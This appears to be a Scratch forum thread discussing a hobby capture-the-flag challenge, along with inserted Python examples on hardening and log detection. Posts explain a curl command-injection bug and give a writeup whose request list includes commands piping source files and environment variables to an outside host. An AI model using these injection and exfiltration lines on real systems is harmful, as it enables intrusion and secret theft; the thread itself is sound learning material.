Discuss Scratch
- NFlex23
-
Scratcher
1000+ posts
ATs Capture The Flag
This is very confusing, as I know almost nothing about vulnerabilities.
- Chiroyce
-
Scratcher
1000+ posts
ATs Capture The Flag
now shall i release an explanation for this or should i wait for more people to complete?
i shutdown the server temporarily - will be back up if you ask
Last edited by Chiroyce (March 19, 2022 14:32:24)
- NFlex23
-
Scratcher
1000+ posts
ATs Capture The Flag
(#103)An explanation would be cool – I had no idea what I was doing, though I did know it had something to do with exploiting the remote command execution of curl.
now shall i release an explanation for this or should i wait for more people to complete?
i shutdown the server temporarily - will be back up if you ask
- scratchusername40
-
Scratcher
1000+ posts
ATs Capture The Flag
(#99)Yooooo! I was so close
scratchusername40 has exploited the vuln but hasn't found the flag, congrats on that at least!!
(i got to know you from my logs -> found your repl)
(#100)Nice job
btw I started a bit late, about 8 minutes ago.
AND Retr0id WINS THE COMPETITION!! They found the flag!!!
whew that was intense!! but you found it!!
(#103)Explanation please
now shall i release an explanation for this or should i wait for more people to complete?
i shutdown the server temporarily - will be back up if you ask
Or even better open the server
Last edited by scratchusername40 (March 19, 2022 14:36:22)
- Retr0id
-
Scratcher
68 posts
ATs Capture The Flag
I'd like to do a quick writeup on how I figured out what the vulnerability was, and what the exploit was.
But I'll wait until the competition is fully over first, ideally other people should still get a chance to solve it.
- scratchusername40
-
Scratcher
1000+ posts
ATs Capture The Flag
(#106)well he took the server down so we can't do anything
I'd like to do a quick writeup on how I figured out what the vulnerability was, and what the exploit was.
But I'll wait until the competition is fully over first, ideally other people should still get a chance to solve it.
- Chiroyce
-
Scratcher
1000+ posts
ATs Capture The Flag
Source code - here
Explanation —
whenever you pressed submit, your input would send a request to the backend like this
https://my-repls-url.rep.co/fetch?domain={YOUR_INPUT}
I used “fetch” to confuse you, it actually used curl on the server
when the server receives the request, it executes the input in the shell (as user input, aka the url is allowed, this is where the vulnerability is, NEVER trust user input directly into the server's shell)
curl {your-url-here}
once you figure this out, you may think that there is no way to actually run your own code, but in bash, you can use a semicolon ; or use && to run two commands, so when it runs in the server, it looks like this
your input: ; echo “malicious code!!”
how it's executed
curl ; echo "malicious code!!"
your input: && echo “malicious code!!”
how it's executed
curl && echo "malicious code!!"
this is referred to as Remote Code Execution (RCE), it basically means running code on a machine that is not physically close to you.
now the flag, was actually not even that hardly hidden. it was literally there in an environment variable called flag lol
so you could do this if you didn't know what the variable's name was
; env # this will return all environment variables
or to find it specifically
; env | grep flag # this will return all lines with the word "flag"
that's it! any doubts?
i'll leave the server on for a while

Last edited by Chiroyce (March 19, 2022 14:45:11)
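The bug the explanation above describes (a request parameter spliced into `curl {your-url-here}` and handed to a shell) is worth seeing next to the fix. The block below is an added example, not the challenge's own main.py or anything from this thread: it builds the challenge-style command as a string and splits it the way bash would at `;` and `&&`, so the "second command" is visible, then shows the hardened replacement: a strict allowlist for the `domain` parameter and an argv list passed to `subprocess.run` with no shell involved. Function names, the regex, and the sample inputs are all constructed for illustration.

```python
from __future__ import annotations

import re
import shlex
import subprocess

# bash control operators: each one ends the current command and starts a new one.
SHELL_SEPARATORS = {";", "&&", "||", "|", "&"}


def vulnerable_command(domain: str) -> str:
    """The pattern the challenge used: the request parameter is spliced straight
    into a shell command line. Returned as a string and never executed here; it
    exists only so we can show how the shell would read it."""
    return f"curl {domain}"


def shell_commands(command_line: str) -> list[list[str]]:
    """Split a command line at bash control operators, the way the shell does
    before running anything, and return one argv list per command.

    shlex in punctuation mode is a tokenizer, not a shell: it is enough to show
    why ';' and '&&' hand the attacker a second command, but it does not model
    quoting subtleties or command substitution such as $(id)."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands: list[list[str]] = []
    current: list[str] = []
    for token in lexer:
        if token in SHELL_SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


# Allowlist for the "domain" parameter: DNS labels plus an optional port.
# Everything else (spaces, ';', '&', '|', '$', '/', quotes, and curl's {} and []
# globbing characters) fails to match and is rejected.
DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+"
    r"[a-z]{2,63}"
    r"(?::\d{1,5})?$",
    re.IGNORECASE,
)


def validate_domain(domain: str) -> bool:
    """True only for host[:port] strings that match the allowlist above."""
    if not DOMAIN_RE.match(domain):
        return False
    if ":" in domain and not 1 <= int(domain.rsplit(":", 1)[1]) <= 65535:
        return False
    return True


def safe_fetch_argv(domain: str) -> list[str]:
    """Hardened replacement for the string-built command: validate first, then
    build an argv list so no shell ever parses the value. The '--' keeps curl
    from treating the parameter as an option even if validation were loosened."""
    if not validate_domain(domain):
        raise ValueError("rejected domain parameter")
    return ["curl", "--silent", "--max-time", "5", "--", domain]


def safe_fetch(domain: str, runner=subprocess.run) -> str:
    """Run the hardened command without shell=True. `runner` is injectable so the
    logic can be exercised (and tested) without network access or curl installed."""
    result = runner(safe_fetch_argv(domain), capture_output=True, text=True, check=False)
    return result.stdout


if __name__ == "__main__":
    for payload in ("example.com", "example.com; env", "example.com && env | grep flag"):
        print(payload, "->", shell_commands(vulnerable_command(payload)),
              "| allowed:", validate_domain(payload))
```

Two things the fix does not do: it still lets the server fetch any public host the allowlist accepts (a separate SSRF concern, not command injection), and the `--` is defence in depth rather than the fix itself; the allowlist plus the argv list is what removes the shell from the picture.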
- NFlex23
-
Scratcher
1000+ posts
ATs Capture The Flag
That's what I was doing, but I never thought of looking in the environmental variables. Good game!
- mybearworld
-
Scratcher
1000+ posts
ATs Capture The Flag
I'd love to find it too, but i couldn't… xD
btw I started a bit late, about 8 minutes ago.
AND Retr0id WINS THE COMPETITION!! They found the flag!!!
whew that was intense!! but you found it!!
now shall i release an explanation for this or should i wait for more people to complete?
That's really easy in hindsight, I did that too first, with echo, but i got an error

Last edited by mybearworld (March 19, 2022 14:49:00)
- Chiroyce
-
Scratcher
1000+ posts
ATs Capture The Flag
I'd love to find it too, but i couldn't… xD
not a problem at all - you simply weren't experienced with vulnerabilities (neither am i, i just thought this would be fine) - you can always learn from this and try it out yourself now

- Chiroyce
-
Scratcher
1000+ posts
ATs Capture The Flag
Also can I know who was the one sending requests which contained the API URL of a social media site made by jeffalo? Was it jeffalo himself or someone else? I'm just curious

Last edited by Chiroyce (March 19, 2022 14:56:05)
- scratchusername40
-
Scratcher
1000+ posts
ATs Capture The Flag
(#108)i knew it was curl, and I had it to where I could do arbitrary code in the shell (kinda a vuln in itself right there) but I don't know how to use bash so i couldn't find the env var.
Also did you finish this 8 months ago??

- mybearworld
-
Scratcher
1000+ posts
ATs Capture The Flag
Well finding out it was curl was easy, just put something invalid
- Chiroyce
-
Scratcher
1000+ posts
ATs Capture The Flag
Also did you finish this 8 months ago??
It was an old repl repurposed for this so that i don't expose the URL to people who know me on replit

Well finding out it was curl was easy, just put something invalid
yeah, i made that on purpose thinking that it would guide the participants in the right direction
i knew it was curl, and I had it to where I could do arbitrary code in the shell (kinda a vuln in itself right there) but I don't know how to use bash so i couldn't find the env var.
yeah, you need to exploit that vuln to find the flag, instead of creating it like you did

Last edited by Chiroyce (March 19, 2022 14:57:44)
- Retr0id
-
Scratcher
68 posts
ATs Capture The Flag
Source code - here
Explanation —
I'll just add some notes on how I went about solving it.
First thing I did was open my browser dev console so I could watch the network requests. Here's the full list of requests I made during solving the challenge:
1. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=example.com
2. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app:31337
3. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app:31337/$(id)
4. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app:31337/$(ls)
5. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app:31337/$(cat main.py)
6. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app/$(cat main.py|nc nxloader.app 31337)
7. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app; curl nxloader.app:31337/lol
8. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app; cat main.py|curl -X POST --data-binary @- nxloader.app:31337/lol
9. https://1c306906-010d-4158-9e8e-5277ec157f03.id.repl.co/fetch?domain=nxloader.app; env|curl -X POST --data-binary @- nxloader.app:31337/lol
1. This was just a check to see how the app worked - of course, it showed me the contents of example.com.
2. This was a request I made to my own domain (nxloader.app), so I could inspect the request headers. This is what I saw on my server, using netcat to receive the raw TCP data:
$ nc -lvp 31337
Listening on 0.0.0.0 31337
Connection received on 6.114.123.34.bc.googleusercontent.com 59892
GET / HTTP/1.1
Host: nxloader.app:31337
User-Agent: curl/7.58.0
Accept: */*
The “curl” user agent immediately indicated to me that the curl shell command was probably being used to make the request, so then I knew to try command injection.
3. I tried injecting the “id” command using bash command substitution syntax. This is what I saw on my server:
$ nc -lvp 31337
Listening on 0.0.0.0 31337
Connection received on 6.114.123.34.bc.googleusercontent.com 59894
GET /uid=1000(runner) HTTP/1.1
Host: nxloader.app:31337
User-Agent: curl/7.58.0
Accept: */*
It worked! Although, “uid=1000(runner)” is only the first part of the output, it's not giving me anything after the space. This would cause me some trouble later…
4. I injected the “ls” command using the same trick, and it responded with “main.py”. I was hoping for a “flag.txt”, so I had to keep looking.
5. I tried dumping main.py so I could have a look, however it only responded with the first word, which happened to be “from”. I needed to improve my data exfiltration method to work with data including spaces…
6. I tried piping a command into netcat, but it didn't work - perhaps netcat was not installed in the server.
7. I switched to using a semicolon to separate my command, this was just a check to see if it would work. It did!
8. I piped the result of “cat main.py” into a curl POST request, which successfully POSTed the entire file contents to my server. It worked, and now I had the challenge source code, but unfortunately for me the flag was not there.
9. I piped the result of the “env” command into a curl POST request, which also worked. Environment variables often include juicy data, like flags, so I read through them all - and then I saw the flag!
Last edited by Retr0id (March 19, 2022 15:03:49)
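Every step of the writeup above left a trace in the server's request log: a `domain` value carrying `$(`, `;` or a pipe. From the defender's side, the useful exercise is spotting those in access logs after the fact. The block below is an added example, not part of the thread or the challenge: it parses combined-format access-log lines, decodes the `domain` query parameter by hand so that percent-encoded `%3B`, `%26` and `%7C` are seen as `;`, `&` and `|` instead of being swallowed as separators, and flags values containing shell metacharacters. The log lines are constructed (documentation IP ranges, placeholder payloads modelled on the kinds already shown in this thread) and the log format is an assumption.

```python
from __future__ import annotations

import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (combined-log style). IPs are from
# documentation ranges; nothing here is from the CTF server.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Mar/2022:14:10:01 +0000] "GET /fetch?domain=example.com HTTP/1.1" 200 1256
203.0.113.5 - - [19/Mar/2022:14:10:09 +0000] "GET /fetch?domain=example.com:31337/$(id) HTTP/1.1" 200 0
203.0.113.5 - - [19/Mar/2022:14:10:20 +0000] "GET /fetch?domain=example.com%3B%20env%20%7C%20grep%20flag HTTP/1.1" 200 0
198.51.100.7 - - [19/Mar/2022:14:11:03 +0000] "GET /fetch?domain=scratch.mit.edu HTTP/1.1" 200 7731
198.51.100.7 - - [19/Mar/2022:14:11:30 +0000] "GET /fetch?domain=example.com%20%26%26%20env HTTP/1.1" 200 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Shell metacharacters that have no business in a hostname parameter: command
# separators, pipes, backticks, line breaks, and the opening of $( ) / ${ }.
INJECTION_RE = re.compile(r"[;&|`\r\n]|\$\(|\$\{")


def parse_line(line: str) -> dict[str, str] | None:
    """Parse one combined-log line into its fields, or None if it doesn't match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_params(target: str) -> dict[str, list[str]]:
    """Decode the query string of a request target by hand. Splitting on '&'
    first and percent-decoding afterwards means %3B, %26 and %7C come out as
    ';', '&' and '|' instead of being dropped or treated as separators."""
    params: dict[str, list[str]] = {}
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def scan_log(text: str, param: str = "domain") -> list[dict[str, str]]:
    """Return one finding per request whose `param` value contains a shell
    metacharacter, recording the first indicator that matched."""
    findings: list[dict[str, str]] = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for value in query_params(rec["target"]).get(param, []):
            m = INJECTION_RE.search(value)
            if m:
                findings.append({"ip": rec["ip"], "ts": rec["ts"],
                                 "value": value, "indicator": m.group(0)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} indicator={f['indicator']!r} value={f['value']!r}")
```

Decoding before matching is the part that matters: a check run on the raw request line would miss `%3B` entirely, and a naive query parser that also splits on `;` (as older versions of Python's `parse_qs` did) would split the payload apart before it was ever examined. The regex is deliberately narrow; pairing it with the allowlist approach on the server side is what actually closes the hole, this only tells you who tried.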
- Chiroyce
-
Scratcher
1000+ posts
ATs Capture The Flag
6. I tried piping a command into netcat, but it didn't work - perhaps netcat was not installed in the server.
Replit's repls don't have netcat.
9. I piped the result of the “env” command into a curl POST request, which also worked. Environment variables often include juicy data, like flags, so I read through them all - and then I saw the flag!
Nice!!
2. This was a request I made to my own domain (nxloader.app), so I could inspect the request headers. This is what I saw on my server, using netcat to receive the raw TCP data:
That seemed a bit overkill lol